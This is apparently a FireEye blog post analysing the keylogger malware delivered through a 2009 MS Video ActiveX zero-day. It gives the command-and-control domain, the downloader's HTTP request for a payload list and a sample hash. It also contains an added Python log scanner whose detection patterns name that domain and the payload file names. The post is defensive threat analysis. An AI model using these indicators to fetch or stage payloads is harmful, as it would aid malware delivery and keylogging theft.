As most readers will already know, a new 0-day vulnerability in MS Video ActiveX Control is currently being exploited in the wild. Lots of research material has already been published covering different aspects of this vulnerability and the attack vector. I have nothing more to add on this front. I would rather focus on explaining the details of the malware behind the scenes.
Readers who are interested in learning more about the vulnerability might refer to these articles:
Surprisingly, no detailed analysis of the underlying malware is yet available on the web (at least I was not able to find it). The primary purpose of this article is to bridge this gap.
Let's just start here.
Packing = NsPack
AV Coverage (Virus Total) = 95.12 %
Although the vulnerability is a 0-day, the malware itself has been around for quite some time. Upon execution, this malware tries to contact its CnC server 'babi2009.com'. Here is what the first HTTP request looks like:
GET /360/aa1dfh.txt HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
The purpose of this HTTP GET request is to download a list of additional malware.
Many of the executables in the above list have names starting with aa**.exe. Although all these binaries have different MD5s, underneath they are a single piece of code: a keylogger.
A Threat Expert analysis for this key logger can be found here.
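As a defender-side illustration of the request pattern described above (an added example, not code from the original post or from FireEye's tooling): a small Python sweep over proxy-log lines that flags traffic to the CnC domain, the /360/ list fetch sent with the sample's User-Agent, and downloads of second-stage binaries with the aa**.exe / 1.exe names. Only the indicator values (domain, path, User-Agent, file names) come from the post; the log format, timestamps, client IPs and example.* hosts are constructed for the example, and since the post does not say where the second-stage binaries are hosted, the file-name check is a heuristic and is assumed, not observed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicators taken from the post: the CnC domain, the first request's path and its User-Agent.
C2_DOMAIN = "babi2009.com"
SAMPLE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

# Constructed proxy-log layout for this example (not any real product's format):
#   <timestamp> <client-ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)
URL_RE = re.compile(r'^https?://(?P<host>[^/:?#]+)(?::\d+)?(?P<path>/[^?#\s]*)?', re.I)

# The first request fetched /360/aa1dfh.txt; generalised here to any short .txt under /360/.
LIST_PATH_RE = re.compile(r'^/360/[a-z0-9]+\.txt$', re.I)
# Second-stage names mentioned in the post: aa**.exe and 1.exe. Their hosting is not
# stated, so this is a file-name heuristic only (assumption).
PAYLOAD_PATH_RE = re.compile(r'/(aa[a-z0-9]*|1)\.exe$', re.I)


@dataclass
class Hit:
    client: str
    host: str
    path: str
    reasons: Tuple[str, ...]
    severity: str


def classify(line: str) -> Optional[Hit]:
    """Return a Hit when the log line matches one or more indicators, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # malformed line: skip it rather than abort the sweep
    u = URL_RE.match(m["url"])
    if not u:
        return None
    host = u["host"].lower()
    path = u["path"] or "/"
    ua_matches = m["ua"] == SAMPLE_UA  # the spoofed IE6 UA is a weak signal on its own

    reasons = []
    if host == C2_DOMAIN or host.endswith("." + C2_DOMAIN):
        reasons.append("known-c2-domain")
    if LIST_PATH_RE.match(path) and ua_matches:
        reasons.append("downloader-list-fetch")
    if PAYLOAD_PATH_RE.search(path) and ua_matches:
        reasons.append("second-stage-exe")
    if not reasons:
        return None

    # A hit on the known domain is high confidence; path/UA-only hits need triage.
    severity = "high" if "known-c2-domain" in reasons else "low"
    return Hit(m["client"], host, path, tuple(reasons), severity)


def scan(lines: List[str]) -> List[Hit]:
    """Run classify() over a batch of log lines and keep the hits, in input order."""
    return [h for h in (classify(l) for l in lines) if h is not None]


# Constructed sample lines: only the indicator values are from the post; timestamps,
# client IPs and the example.* hosts are made up.
SAMPLE_LOG = [
    '2009-07-08T10:01:02Z 10.0.0.5 GET http://www.example.com/index.html 200 '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '2009-07-08T10:01:09Z 10.0.0.5 GET http://babi2009.com/360/aa1dfh.txt 200 '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '2009-07-08T10:01:11Z 10.0.0.5 GET http://babi2009.com/360/aa12.exe 200 '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '2009-07-08T10:02:30Z 10.0.0.7 GET http://cdn.example.net/360/list.txt 200 '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    'not a log line at all',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.severity:4} {hit.client} -> {hit.host}{hit.path} {', '.join(hit.reasons)}")
```

The benign first line carries the same User-Agent as the sample but produces no hit, which is the point of combining the UA with host and path: the IE6 string alone was a common legitimate browser at the time and would only generate noise.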
The only binary that differs from the rest is the last one, 1.exe (B6941043CA9FA2E589C4B4BCE275C6D0). The outbound communication for this child download looks like this:
The above-mentioned malware is certainly just one instance currently exploiting this vulnerability. In the coming days we will see more malware paired with this exploit, and things will continue to get worse until Microsoft comes up with a patch. We have already seen a huge spike in infections by this malware through our Malware Analysis & Exchange (MAX) Network since the exploit was made public.
There are many details which I am leaving out for today, and I hope to come up with more in the next few days.
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM